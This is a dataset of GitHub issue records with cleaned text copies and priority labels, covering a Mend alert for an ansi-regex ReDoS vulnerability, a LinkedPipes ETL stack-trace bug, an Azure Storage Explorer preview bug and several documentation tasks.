## CVE-2021-3807 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>ansi-regex-3.0.0.tgz</b>, <b>ansi-regex-4.1.0.tgz</b></p></summary> <p> <details><summary><b>ansi-regex-3.0.0.tgz</b></p></summary> <p>Regular expression for matching ANSI escape codes</p> <p>Library home page: <a href="https://registry.npmjs.org/ansi-regex/-/ansi-regex-3.0.0.tgz">https://registry.npmjs.org/ansi-regex/-/ansi-regex-3.0.0.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/log-update/node_modules/ansi-regex/package.json</p> <p> Dependency Hierarchy: - jest-24.5.0.tgz (Root Library) - jest-cli-24.8.0.tgz - core-24.8.0.tgz - reporters-24.8.0.tgz - string-length-2.0.0.tgz - strip-ansi-4.0.0.tgz - :x: **ansi-regex-3.0.0.tgz** (Vulnerable Library) </details> <details><summary><b>ansi-regex-4.1.0.tgz</b></p></summary> <p>Regular expression for matching ANSI escape codes</p> <p>Library home page: <a href="https://registry.npmjs.org/ansi-regex/-/ansi-regex-4.1.0.tgz">https://registry.npmjs.org/ansi-regex/-/ansi-regex-4.1.0.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/@jest/core/node_modules/ansi-regex/package.json</p> <p> Dependency Hierarchy: - jest-24.5.0.tgz (Root Library) - jest-cli-24.8.0.tgz - core-24.8.0.tgz - strip-ansi-5.2.0.tgz - :x: **ansi-regex-4.1.0.tgz** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/andygonzalez2010/store/commit/3f6d614029f4d6cfdddfcef8468949cb7822503c">3f6d614029f4d6cfdddfcef8468949cb7822503c</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> ansi-regex is vulnerable to Inefficient Regular Expression Complexity <p>Publish Date: 2021-09-17 <p>URL: <a href=https://www.mend.io/vulnerability-database/CVE-2021-3807>CVE-2021-3807</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994/">https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994/</a></p> <p>Release Date: 2021-09-17</p> <p>Fix Resolution (ansi-regex): 3.0.1</p> <p>Direct dependency fix Resolution (jest): 24.6.0</p><p>Fix Resolution (ansi-regex): 4.1.1</p> <p>Direct dependency fix Resolution (jest): 26.0.0</p> </p> </details> <p></p> *** Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
True
CVE-2021-3807 (High) detected in ansi-regex-3.0.0.tgz, ansi-regex-4.1.0.tgz - autoclosed - ## CVE-2021-3807 - High Severity Vulnerability <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Libraries - <b>ansi-regex-3.0.0.tgz</b>, <b>ansi-regex-4.1.0.tgz</b></p></summary> <p> <details><summary><b>ansi-regex-3.0.0.tgz</b></p></summary> <p>Regular expression for matching ANSI escape codes</p> <p>Library home page: <a href="https://registry.npmjs.org/ansi-regex/-/ansi-regex-3.0.0.tgz">https://registry.npmjs.org/ansi-regex/-/ansi-regex-3.0.0.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/log-update/node_modules/ansi-regex/package.json</p> <p> Dependency Hierarchy: - jest-24.5.0.tgz (Root Library) - jest-cli-24.8.0.tgz - core-24.8.0.tgz - reporters-24.8.0.tgz - string-length-2.0.0.tgz - strip-ansi-4.0.0.tgz - :x: **ansi-regex-3.0.0.tgz** (Vulnerable Library) </details> <details><summary><b>ansi-regex-4.1.0.tgz</b></p></summary> <p>Regular expression for matching ANSI escape codes</p> <p>Library home page: <a href="https://registry.npmjs.org/ansi-regex/-/ansi-regex-4.1.0.tgz">https://registry.npmjs.org/ansi-regex/-/ansi-regex-4.1.0.tgz</a></p> <p>Path to dependency file: /package.json</p> <p>Path to vulnerable library: /node_modules/@jest/core/node_modules/ansi-regex/package.json</p> <p> Dependency Hierarchy: - jest-24.5.0.tgz (Root Library) - jest-cli-24.8.0.tgz - core-24.8.0.tgz - strip-ansi-5.2.0.tgz - :x: **ansi-regex-4.1.0.tgz** (Vulnerable Library) </details> <p>Found in HEAD commit: <a href="https://github.com/andygonzalez2010/store/commit/3f6d614029f4d6cfdddfcef8468949cb7822503c">3f6d614029f4d6cfdddfcef8468949cb7822503c</a></p> <p>Found in base branch: <b>master</b></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/high_vul.png' width=19 height=20> Vulnerability Details</summary> <p> ansi-regex is vulnerable to Inefficient Regular Expression Complexity <p>Publish Date: 2021-09-17 <p>URL: <a href=https://www.mend.io/vulnerability-database/CVE-2021-3807>CVE-2021-3807</a></p> </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS 3 Score Details (<b>7.5</b>)</summary> <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> </details> <p></p> <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/suggested_fix.png' width=19 height=20> Suggested Fix</summary> <p> <p>Type: Upgrade version</p> <p>Origin: <a href="https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994/">https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994/</a></p> <p>Release Date: 2021-09-17</p> <p>Fix Resolution (ansi-regex): 3.0.1</p> <p>Direct dependency fix Resolution (jest): 24.6.0</p><p>Fix Resolution (ansi-regex): 4.1.1</p> <p>Direct dependency fix Resolution (jest): 26.0.0</p> </p> </details> <p></p> *** Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github)
non_priority
cve high detected in ansi regex tgz ansi regex tgz autoclosed cve high severity vulnerability vulnerable libraries ansi regex tgz ansi regex tgz ansi regex tgz regular expression for matching ansi escape codes library home page a href path to dependency file package json path to vulnerable library node modules log update node modules ansi regex package json dependency hierarchy jest tgz root library jest cli tgz core tgz reporters tgz string length tgz strip ansi tgz x ansi regex tgz vulnerable library ansi regex tgz regular expression for matching ansi escape codes library home page a href path to dependency file package json path to vulnerable library node modules jest core node modules ansi regex package json dependency hierarchy jest tgz root library jest cli tgz core tgz strip ansi tgz x ansi regex tgz vulnerable library found in head commit a href found in base branch master vulnerability details ansi regex is vulnerable to inefficient regular expression complexity publish date url a href cvss score details base score metrics exploitability metrics attack vector network attack complexity low privileges required none user interaction none scope unchanged impact metrics confidentiality impact none integrity impact none availability impact high for more information on scores click a href suggested fix type upgrade version origin a href release date fix resolution ansi regex direct dependency fix resolution jest fix resolution ansi regex direct dependency fix resolution jest step up your open source security game with mend
0
125,082
10,336,352,912
IssuesEvent
2019-09-03 12:48:02
linkedpipes/etl
https://api.github.com/repos/linkedpipes/etl
closed
Debug from for (No working data)
enhancement test
User can now try to continue execution that was run in "No working data" mode. This action cause an error message that is no information about the cause: ``` {"error":{"status":"INTERNAL_SERVER_ERROR","message":"Literal label cannot be null","stackTrace":"java.lang.NullPointerException: Literal label cannot be null\n\tat java.base/java.util.Objects.requireNonNull(Objects.java:246)\n\tat org.eclipse.rdf4j.model.impl.SimpleLiteral.setLabel(SimpleLiteral.java:112)\n\tat org.eclipse.rdf4j.model.impl.SimpleLiteral.<init>(SimpleLiteral.java:97)\n\tat org.eclipse.rdf4j.model.impl.AbstractValueFactory.createLiteral(AbstractValueFactory.java:103)\n\tat com.linkedpipes.etl.rdf.utils.rdf4j.StatementsCollector.string(StatementsCollector.java:78)\n\tat com.linkedpipes.etl.storage.unpacker.model.executor.ExecutorDataSource.write(ExecutorDataSource.java:23)\n\tat com.linkedpipes.etl.storage.unpacker.model.executor.ExecutorPort.writeDataSource(ExecutorPort.java:60)\n\tat com.linkedpipes.etl.storage.unpacker.model.executor.ExecutorPort.write(ExecutorPort.java:45)\n\tat com.linkedpipes.etl.storage.unpacker.model.executor.ExecutorComponent.writeMapped(ExecutorComponent.java:88)\n\tat com.linkedpipes.etl.storage.unpacker.model.executor.ExecutorComponent.write(ExecutorComponent.java:48)\n\tat com.linkedpipes.etl.storage.unpacker.model.executor.ExecutorPipeline.write(ExecutorPipeline.java:46)\n\tat com.linkedpipes.etl.storage.unpacker.UnpackerFacade.unpack(UnpackerFacade.java:82)\n\tat com.linkedpipes.etl.storage.unpacker.UnpackerFacade.unpack(UnpackerFacade.java:42)\n\tat com.linkedpipes.etl.storage.web.servlet.PipelineServlet.unpackPipeline(PipelineServlet.java:125)\n\tat java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\n\tat java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\n\tat java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\n\tat java.base/java.lang.reflect.Method.invoke(Method.java:566)\n\tat org.springframework.web.method.support.InvocableHandlerMethod.doInvoke(InvocableHandlerMethod.java:205)\n\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:133)\n\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:97)\n\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:849)\n\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:760)\n\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:85)\n\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967)\n\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)\n\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)\n\tat org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:872)\n\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:707)\n\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)\n\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:790)\n\tat org.eclipse.jetty.servlet.ServletHolder.handle(ServletHolder.java:865)\n\tat org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:535)\n\tat org.eclipse.jetty.server.handler.ScopedHandler.nextHandle(ScopedHandler.java:255)\n\tat org.eclipse.jetty.server.handler.ContextHandler.doHandle(ContextHandler.java:1340)\n\tat org.eclipse.jetty.server.handler.ScopedHandler.nextScope(ScopedHandler.java:203)\n\tat org.eclipse.jetty.servlet.ServletHandler.doScope(ServletHandler.java:473)\n\tat org.eclipse.jetty.server.handler.ScopedHandler.nextScope(ScopedHandler.java:201)\n\tat org.eclipse.jetty.server.handler.ContextHandler.doScope(ContextHandler.java:1242)\n\tat org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:144)\n\tat org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:132)\n\tat org.eclipse.jetty.server.Server.handle(Server.java:503)\n\tat org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:364)\n\tat org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:260)\n\tat org.eclipse.jetty.io.AbstractConnection$ReadCallback.succeeded(AbstractConnection.java:305)\n\tat org.eclipse.jetty.io.FillInterest.fillable(FillInterest.java:103)\n\tat org.eclipse.jetty.io.ChannelEndPoint$2.run(ChannelEndPoint.java:118)\n\tat org.eclipse.jetty.util.thread.strategy.EatWhatYouKill.runTask(EatWhatYouKill.java:333)\n\tat org.eclipse.jetty.util.thread.strategy.EatWhatYouKill.doProduce(EatWhatYouKill.java:310)\n\tat org.eclipse.jetty.util.thread.strategy.EatWhatYouKill.tryProduce(EatWhatYouKill.java:168)\n\tat org.eclipse.jetty.util.thread.strategy.EatWhatYouKill.run(EatWhatYouKill.java:126)\n\tat org.eclipse.jetty.util.thread.ReservedThreadExecutor$ReservedThread.run(ReservedThreadExecutor.java:366)\n\tat org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:765)\n\tat org.eclipse.jetty.util.thread.QueuedThreadPool$2.run(QueuedThreadPool.java:683)\n\tat java.base/java.lang.Thread.run(Thread.java:834)\n","source":"STORAGE"}} ``` A better error message should be provided.
1.0
Debug from for (No working data) - User can now try to continue execution that was run in "No working data" mode. This action cause an error message that is no information about the cause: ``` {"error":{"status":"INTERNAL_SERVER_ERROR","message":"Literal label cannot be null","stackTrace":"java.lang.NullPointerException: Literal label cannot be null\n\tat java.base/java.util.Objects.requireNonNull(Objects.java:246)\n\tat org.eclipse.rdf4j.model.impl.SimpleLiteral.setLabel(SimpleLiteral.java:112)\n\tat org.eclipse.rdf4j.model.impl.SimpleLiteral.<init>(SimpleLiteral.java:97)\n\tat org.eclipse.rdf4j.model.impl.AbstractValueFactory.createLiteral(AbstractValueFactory.java:103)\n\tat com.linkedpipes.etl.rdf.utils.rdf4j.StatementsCollector.string(StatementsCollector.java:78)\n\tat com.linkedpipes.etl.storage.unpacker.model.executor.ExecutorDataSource.write(ExecutorDataSource.java:23)\n\tat com.linkedpipes.etl.storage.unpacker.model.executor.ExecutorPort.writeDataSource(ExecutorPort.java:60)\n\tat com.linkedpipes.etl.storage.unpacker.model.executor.ExecutorPort.write(ExecutorPort.java:45)\n\tat com.linkedpipes.etl.storage.unpacker.model.executor.ExecutorComponent.writeMapped(ExecutorComponent.java:88)\n\tat com.linkedpipes.etl.storage.unpacker.model.executor.ExecutorComponent.write(ExecutorComponent.java:48)\n\tat com.linkedpipes.etl.storage.unpacker.model.executor.ExecutorPipeline.write(ExecutorPipeline.java:46)\n\tat com.linkedpipes.etl.storage.unpacker.UnpackerFacade.unpack(UnpackerFacade.java:82)\n\tat com.linkedpipes.etl.storage.unpacker.UnpackerFacade.unpack(UnpackerFacade.java:42)\n\tat com.linkedpipes.etl.storage.web.servlet.PipelineServlet.unpackPipeline(PipelineServlet.java:125)\n\tat java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\n\tat java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\n\tat java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\n\tat java.base/java.lang.reflect.Method.invoke(Method.java:566)\n\tat org.springframework.web.method.support.InvocableHandlerMethod.doInvoke(InvocableHandlerMethod.java:205)\n\tat org.springframework.web.method.support.InvocableHandlerMethod.invokeForRequest(InvocableHandlerMethod.java:133)\n\tat org.springframework.web.servlet.mvc.method.annotation.ServletInvocableHandlerMethod.invokeAndHandle(ServletInvocableHandlerMethod.java:97)\n\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.invokeHandlerMethod(RequestMappingHandlerAdapter.java:849)\n\tat org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter.handleInternal(RequestMappingHandlerAdapter.java:760)\n\tat org.springframework.web.servlet.mvc.method.AbstractHandlerMethodAdapter.handle(AbstractHandlerMethodAdapter.java:85)\n\tat org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967)\n\tat org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)\n\tat org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)\n\tat org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:872)\n\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:707)\n\tat org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)\n\tat javax.servlet.http.HttpServlet.service(HttpServlet.java:790)\n\tat org.eclipse.jetty.servlet.ServletHolder.handle(ServletHolder.java:865)\n\tat org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:535)\n\tat org.eclipse.jetty.server.handler.ScopedHandler.nextHandle(ScopedHandler.java:255)\n\tat org.eclipse.jetty.server.handler.ContextHandler.doHandle(ContextHandler.java:1340)\n\tat org.eclipse.jetty.server.handler.ScopedHandler.nextScope(ScopedHandler.java:203)\n\tat org.eclipse.jetty.servlet.ServletHandler.doScope(ServletHandler.java:473)\n\tat org.eclipse.jetty.server.handler.ScopedHandler.nextScope(ScopedHandler.java:201)\n\tat org.eclipse.jetty.server.handler.ContextHandler.doScope(ContextHandler.java:1242)\n\tat org.eclipse.jetty.server.handler.ScopedHandler.handle(ScopedHandler.java:144)\n\tat org.eclipse.jetty.server.handler.HandlerWrapper.handle(HandlerWrapper.java:132)\n\tat org.eclipse.jetty.server.Server.handle(Server.java:503)\n\tat org.eclipse.jetty.server.HttpChannel.handle(HttpChannel.java:364)\n\tat org.eclipse.jetty.server.HttpConnection.onFillable(HttpConnection.java:260)\n\tat org.eclipse.jetty.io.AbstractConnection$ReadCallback.succeeded(AbstractConnection.java:305)\n\tat org.eclipse.jetty.io.FillInterest.fillable(FillInterest.java:103)\n\tat org.eclipse.jetty.io.ChannelEndPoint$2.run(ChannelEndPoint.java:118)\n\tat org.eclipse.jetty.util.thread.strategy.EatWhatYouKill.runTask(EatWhatYouKill.java:333)\n\tat org.eclipse.jetty.util.thread.strategy.EatWhatYouKill.doProduce(EatWhatYouKill.java:310)\n\tat org.eclipse.jetty.util.thread.strategy.EatWhatYouKill.tryProduce(EatWhatYouKill.java:168)\n\tat org.eclipse.jetty.util.thread.strategy.EatWhatYouKill.run(EatWhatYouKill.java:126)\n\tat org.eclipse.jetty.util.thread.ReservedThreadExecutor$ReservedThread.run(ReservedThreadExecutor.java:366)\n\tat org.eclipse.jetty.util.thread.QueuedThreadPool.runJob(QueuedThreadPool.java:765)\n\tat org.eclipse.jetty.util.thread.QueuedThreadPool$2.run(QueuedThreadPool.java:683)\n\tat java.base/java.lang.Thread.run(Thread.java:834)\n","source":"STORAGE"}} ``` A better error message should be provided.
non_priority
debug from for no working data user can now try to continue execution that was run in no working data mode this action cause an error message that is no information about the cause error status internal server error message literal label cannot be null stacktrace java lang nullpointerexception literal label cannot be null n tat java base java util objects requirenonnull objects java n tat org eclipse model impl simpleliteral setlabel simpleliteral java n tat org eclipse model impl simpleliteral simpleliteral java n tat org eclipse model impl abstractvaluefactory createliteral abstractvaluefactory java n tat com linkedpipes etl rdf utils statementscollector string statementscollector java n tat com linkedpipes etl storage unpacker model executor executordatasource write executordatasource java n tat com linkedpipes etl storage unpacker model executor executorport writedatasource executorport java n tat com linkedpipes etl storage unpacker model executor executorport write executorport java n tat com linkedpipes etl storage unpacker model executor executorcomponent writemapped executorcomponent java n tat com linkedpipes etl storage unpacker model executor executorcomponent write executorcomponent java n tat com linkedpipes etl storage unpacker model executor executorpipeline write executorpipeline java n tat com linkedpipes etl storage unpacker unpackerfacade unpack unpackerfacade java n tat com linkedpipes etl storage unpacker unpackerfacade unpack unpackerfacade java n tat com linkedpipes etl storage web servlet pipelineservlet unpackpipeline pipelineservlet java n tat java base jdk internal reflect nativemethodaccessorimpl native method n tat java base jdk internal reflect nativemethodaccessorimpl invoke nativemethodaccessorimpl java n tat java base jdk internal reflect delegatingmethodaccessorimpl invoke delegatingmethodaccessorimpl java n tat java base java lang reflect method invoke method java n tat org springframework web method support invocablehandlermethod doinvoke invocablehandlermethod java n tat org springframework web method support invocablehandlermethod invokeforrequest invocablehandlermethod java n tat org springframework web servlet mvc method annotation servletinvocablehandlermethod invokeandhandle servletinvocablehandlermethod java n tat org springframework web servlet mvc method annotation requestmappinghandleradapter invokehandlermethod requestmappinghandleradapter java n tat org springframework web servlet mvc method annotation requestmappinghandleradapter handleinternal requestmappinghandleradapter java n tat org springframework web servlet mvc method abstracthandlermethodadapter handle abstracthandlermethodadapter java n tat org springframework web servlet dispatcherservlet dodispatch dispatcherservlet java n tat org springframework web servlet dispatcherservlet doservice dispatcherservlet java n tat org springframework web servlet frameworkservlet processrequest frameworkservlet java n tat org springframework web servlet frameworkservlet dopost frameworkservlet java n tat javax servlet http httpservlet service httpservlet java n tat org springframework web servlet frameworkservlet service frameworkservlet java n tat javax servlet http httpservlet service httpservlet java n tat org eclipse jetty servlet servletholder handle servletholder java n tat org eclipse jetty servlet servlethandler dohandle servlethandler java n tat org eclipse jetty server handler scopedhandler nexthandle scopedhandler java n tat org eclipse jetty server handler contexthandler dohandle contexthandler java n tat org eclipse jetty server handler scopedhandler nextscope scopedhandler java n tat org eclipse jetty servlet servlethandler doscope servlethandler java n tat org eclipse jetty server handler scopedhandler nextscope scopedhandler java n tat org eclipse jetty server handler contexthandler doscope contexthandler java n tat org eclipse jetty server handler scopedhandler handle scopedhandler java n tat org eclipse jetty server handler handlerwrapper handle handlerwrapper java n tat org eclipse jetty server server handle server java n tat org eclipse jetty server httpchannel handle httpchannel java n tat org eclipse jetty server httpconnection onfillable httpconnection java n tat org eclipse jetty io abstractconnection readcallback succeeded abstractconnection java n tat org eclipse jetty io fillinterest fillable fillinterest java n tat org eclipse jetty io channelendpoint run channelendpoint java n tat org eclipse jetty util thread strategy eatwhatyoukill runtask eatwhatyoukill java n tat org eclipse jetty util thread strategy eatwhatyoukill doproduce eatwhatyoukill java n tat org eclipse jetty util thread strategy eatwhatyoukill tryproduce eatwhatyoukill java n tat org eclipse jetty util thread strategy eatwhatyoukill run eatwhatyoukill java n tat org eclipse jetty util thread reservedthreadexecutor reservedthread run reservedthreadexecutor java n tat org eclipse jetty util thread queuedthreadpool runjob queuedthreadpool java n tat org eclipse jetty util thread queuedthreadpool run queuedthreadpool java n tat java base java lang thread run thread java n source storage a better error message should be provided
0
65,964
8,868,876,794
IssuesEvent
2019-01-11 02:07:51
PegaSysEng/pantheon
https://api.github.com/repos/PegaSysEng/pantheon
closed
Document that admin_peers included in admin API group
doc next release documentation
### Description As a user, I want documentation so that I know which API group to enable to use admin_peers. ### Acceptance Criteria * Documented that admin_peers is part of admin API * Documentation tested
1.0
Document that admin_peers included in admin API group - ### Description As a user, I want documentation so that I know which API group to enable to use admin_peers. ### Acceptance Criteria * Documented that admin_peers is part of admin API * Documentation tested
non_priority
document that admin peers included in admin api group description as a user i want documentation so that i know which api group to enable to use admin peers acceptance criteria documented that admin peers is part of admin api documentation tested
0
333,348
29,525,331,397
IssuesEvent
2023-06-05 07:14:44
microsoft/AzureStorageExplorer
https://api.github.com/repos/microsoft/AzureStorageExplorer
opened
Fail to preview files whose parent folder name ends with a dot and the setting "Disable file sharing trailing dot support" is not checked
🧪 testing :gear: files
**Storage Explorer Version**: 1.30.0 **Build Number**: 20230603.6 **Branch**: main **Platform/OS**: Windows 10/Linux Ubuntu 20.04/MacOS Ventura 13.4 (Apple M1 Pro) **Architecture**: x64/arm64 **How Found**: Exploratory testing **Regression From**: Not a regression ## Steps to Reproduce ## 1. Launch storage explorer -> Uncheck the setting 'Disable File Share Trailing Dot Support'. 2. Expand one storage account -> File Shares. 3. Create a file share -> Create a new folder named 'test.' -> Upload one file to the folder. 4. Right click the file -> Click 'Preview'. 5. Check whether succeeds to preview the file. ## Expected Experience ## Succeed to preview the file. ## Actual Experience ## Fail to preview the file. ![image](https://github.com/microsoft/AzureStorageExplorer/assets/41351993/b1bd0233-2042-44e4-bc60-08250f4d62d7) Error details: ` "name": "RestError", "message": "The specified parent path does not exist.\nRequestId:42c48d23-701a-0038-737b-9723de000000\nTime:2023-06-05T06:58:27.9069749Z",`
1.0
Fail to preview files whose parent folder name ends with a dot and the setting "Disable file sharing trailing dot support" is not checked - **Storage Explorer Version**: 1.30.0 **Build Number**: 20230603.6 **Branch**: main **Platform/OS**: Windows 10/Linux Ubuntu 20.04/MacOS Ventura 13.4 (Apple M1 Pro) **Architecture**: x64/arm64 **How Found**: Exploratory testing **Regression From**: Not a regression ## Steps to Reproduce ## 1. Launch storage explorer -> Uncheck the setting 'Disable File Share Trailing Dot Support'. 2. Expand one storage account -> File Shares. 3. Create a file share -> Create a new folder named 'test.' -> Upload one file to the folder. 4. Right click the file -> Click 'Preview'. 5. Check whether succeeds to preview the file. ## Expected Experience ## Succeed to preview the file. ## Actual Experience ## Fail to preview the file. ![image](https://github.com/microsoft/AzureStorageExplorer/assets/41351993/b1bd0233-2042-44e4-bc60-08250f4d62d7) Error details: ` "name": "RestError", "message": "The specified parent path does not exist.\nRequestId:42c48d23-701a-0038-737b-9723de000000\nTime:2023-06-05T06:58:27.9069749Z",`
non_priority
fail to preview files whose parent folder name ends with a dot and the setting disable file sharing trailing dot support is not checked storage explorer version build number branch main platform os windows linux ubuntu macos ventura apple pro architecture how found exploratory testing regression from not a regression steps to reproduce launch storage explorer uncheck the setting disable file share trailing dot support expand one storage account file shares create a file share create a new folder named test upload one file to the folder right click the file click preview check whether succeeds to preview the file expected experience succeed to preview the file actual experience fail to preview the file error details name resterror message the specified parent path does not exist nrequestid ntime
0
438,227
30,632,311,513
IssuesEvent
2023-07-24 15:16:44
inbo/camtraptor
https://api.github.com/repos/inbo/camtraptor
closed
Correct vignette visualization deployment
documentation
Thanks @peterdesmet to notice the following: 1. Sentence _Notice how zero values are also visualized by a specific circle marker for ease detection. Color: red by default._ seems outdated as the color of the "x" in the leaflet is not red? 2. There is also a typo: "Tip**l**cally" should be "Tip**y**cally".
1.0
Correct vignette visualization deployment - Thanks @peterdesmet to notice the following: 1. Sentence _Notice how zero values are also visualized by a specific circle marker for ease detection. Color: red by default._ seems outdated as the color of the "x" in the leaflet is not red? 2. There is also a typo: "Tip**l**cally" should be "Tip**y**cally".
non_priority
correct vignette visualization deployment thanks peterdesmet to notice the following sentence notice how zero values are also visualized by a specific circle marker for ease detection color red by default seems outdated as the color of the x in the leaflet is not red there is also a typo tip l cally should be tip y cally
0
57,314
8,175,193,396
IssuesEvent
2018-08-28 00:36:57
openworm/ChannelWorm2
https://api.github.com/repos/openworm/ChannelWorm2
closed
Document CWFitter
Beginner Documentation
The parameter fitting scripts [CWFitter](https://github.com/openworm/ChannelWorm/tree/master/channelworm/fitter) need to be documented. I created a new branch called CWFitterDoc that includes Jupyter notebooks for the ion channel scripts that are in the examples folder. I've started on breaking down the code into more modular pieces and have added in a few scattered comments. Any help would be appreciated! @rgerkin @slarson
1.0
Document CWFitter - The parameter fitting scripts [CWFitter](https://github.com/openworm/ChannelWorm/tree/master/channelworm/fitter) need to be documented. I created a new branch called CWFitterDoc that includes Jupyter notebooks for the ion channel scripts that are in the examples folder. I've started on breaking down the code into more modular pieces and have added in a few scattered comments. Any help would be appreciated! @rgerkin @slarson
non_priority
document cwfitter the parameter fitting scripts need to be documented i created a new branch called cwfitterdoc that includes jupyter notebooks for the ion channel scripts that are in the examples folder i ve started on breaking down the code into more modular pieces and have added in a few scattered comments any help would be appreciated rgerkin slarson
0
195,823
15,557,804,607
IssuesEvent
2021-03-16 09:33:55
BAMresearch/TGA-FTIR-hyphenation-tool-kit
https://api.github.com/repos/BAMresearch/TGA-FTIR-hyphenation-tool-kit
opened
Wiki: Add deconvolution information about Fitting_parameter.xlsx
documentation
Provide detailed information about the Fitting_parameter.xlsx, including links to refered publications.
1.0
Wiki: Add deconvolution information about Fitting_parameter.xlsx - Provide detailed information about the Fitting_parameter.xlsx, including links to refered publications.
non_priority
wiki add deconvolution information about fitting parameter xlsx provide detailed information about the fitting parameter xlsx including links to refered publications
0
46,202
18,990,922,383
IssuesEvent
2021-11-22 07:08:52
kenkit/neon_service
https://api.github.com/repos/kenkit/neon_service
opened
[9ef0db] neon_service.exe: common_strnlen_c<0,unsigned char>, common_strnlen_simd<0,0,unsigned char>, common_strnlen<0,unsign...
neon_service_crash
